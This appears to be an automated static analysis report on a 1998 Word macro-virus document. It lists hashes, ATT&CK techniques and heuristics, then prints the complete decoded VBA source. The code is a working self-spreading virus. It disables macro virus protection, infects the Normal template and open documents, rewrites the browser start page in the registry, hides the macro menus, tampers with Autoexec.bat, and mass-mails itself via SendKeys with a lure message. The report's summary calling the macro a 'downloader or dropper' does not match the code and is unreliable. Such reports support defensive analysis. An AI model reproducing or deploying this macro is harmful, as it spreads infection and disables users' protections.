Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 166be4975df0a5e6…

MALICIOUS

Office (OLE)

Size: 55.0 KB
Created: 1998-10-17 09:16:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 9c4eab1909e99ba6668ebfd3a2d9c041
SHA-1: e412faabddadf76249857d76fcfe65a5d1405bbe
SHA-256: 166be4975df0a5e6a0c8b4d4bff7f9e4511837db17b7c8140c1037b05f232596
Risk score: 82

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious documents. The script attempts to modify the Internet Explorer start page to 'http://www.kevinmitnick.com' and remove menu items related to macros. It also exports a DLL to 'c:\waterf.dll', suggesting it acts as a downloader or dropper for a second-stage payload.

Heuristics (4)

  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code.
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro present.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://www.kevinmitnick.com (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3016 bytes
SHA-256: da4d886103bef88c7a870f5a95c5e847558b91cd4fa365be4a2829c142fb68e7

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "waterfall"
Sub AutoOpen()
On Error Resume Next
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
Application.ScreenUpdating = False
Options.SaveNormalPrompt = False
thinkerinstalled = False
Grudge = ActiveDocument
GrudgeInstalled = False
Thinker = NormalTemplate
For z = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(z).Name = "waterfall" Then
thinkerinstalled = True
End If
Next

For m = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(m).Name = "waterfall" Then
GrudgeInstalled = True
End If
Next

If thinkerinstalled = False Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\main", "Start Page") = "http://www.kevinmitnick.com"
CommandBars("tools").Controls("Templates and add-ins...").Delete
CommandBars("tools").Controls("Macro").Delete

End If

ToolsOptionsGeneral.SendMailAttach = 1
Application.VBE.ActiveVBProject.VBComponents("waterfall").Export "c:\waterf.dll"
If thinkerinstalled = False Then Set waterfallz = NormalTemplate.VBProject
If GrudgeInstalled = False Then Set waterfallz = ActiveDocument.VBProject
With waterfallz
With .VBComponents.Import("c:\waterf.dll")
End With
End With
If GrudgeInstalled = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument

Reset
Kill "c:\waterf.dll"
Application.DisplayAlerts = wdAlertsAll
waterfall:

If (Month(Now)) = 12 And (Minute(Now)) = 12 Then
Open "c:\Autoexec.bat" For Append As 1
Print #1, "@echo off"
Print #1, "echo I have committed the sin of hacking and am unfit in the eyes of the Lord."
Print #1, "Echo I confess to acts of witchcraft and art, dissidence and voodoo."
Print #1, "Echo But in my Craft for which you condemn me,"
Print #1, "Echo I SURF THE BRAINWAVES OF GOD."
Reset
End If
Call autonomailer
End Sub

Sub autonomailer()
On Error Resume Next
If WordBasic.AppIsRunning("Internet Mail") Then
ActiveDocument.SaveAs FileName:="c:\doc1.doc", FileFormat:=wdFormatDocument, addtorecentfiles:=False
m$ = Application.UserName
WordBasic.AppActivate "Internet Mail"
WordBasic.SendKeys "%MN"
WordBasic.SendKeys "%MR"
WordBasic.SendKeys "%o"
WordBasic.SendKeys "{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{TAB}{ENTER}"
WordBasic.SendKeys "{TAB}{TAB}"
WordBasic.SendKeys "Hey"
WordBasic.SendKeys "{TAB}"
WordBasic.SendKeys "Hey{ENTER}"
WordBasic.SendKeys "Youve just got to read this!{enter}"
WordBasic.SendKeys "Peace {enter}"
WordBasic.SendKeys m$
WordBasic.SendKeys "%IF"
WordBasic.SendKeys "c:\doc1.doc"
WordBasic.SendKeys "%A"
WordBasic.SendKeys "%FM"
WordBasic.SendKeys "^M"
End If

End Sub